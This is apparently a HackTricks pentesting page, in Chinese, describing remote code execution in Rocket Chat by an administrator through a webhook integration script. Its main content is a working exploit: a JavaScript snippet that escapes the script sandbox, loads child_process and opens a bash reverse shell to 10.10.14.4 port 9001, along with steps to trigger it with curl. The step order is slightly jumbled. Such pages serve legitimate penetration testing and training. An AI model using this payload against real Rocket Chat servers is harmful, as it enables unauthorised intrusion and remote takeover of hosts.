hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

3.9 KiB
Raw Blame History

Rocket Chat

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持 HackTricks 的其他方式:

{% embed url="https://websec.nl/" %}

RCE

如果您是 Rocket Chat 内的管理员,您可以获得 RCE。

  • 转到**Integrations,选择New Integration,并选择任何一个:Incoming WebHook** 或 Outgoing WebHook
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • 配置 WebHook频道和发布者用户名必须存在
  • 配置 WebHook 脚本:
  • 保存更改
  • 获取生成的 WebHook URL
  • 使用 curl 调用它,您应该收到反向 shell

{% embed url="https://websec.nl/" %}

从零开始学习 AWS 黑客技术,成为专家 htARTEHackTricks AWS 红队专家)

支持 HackTricks 的其他方式: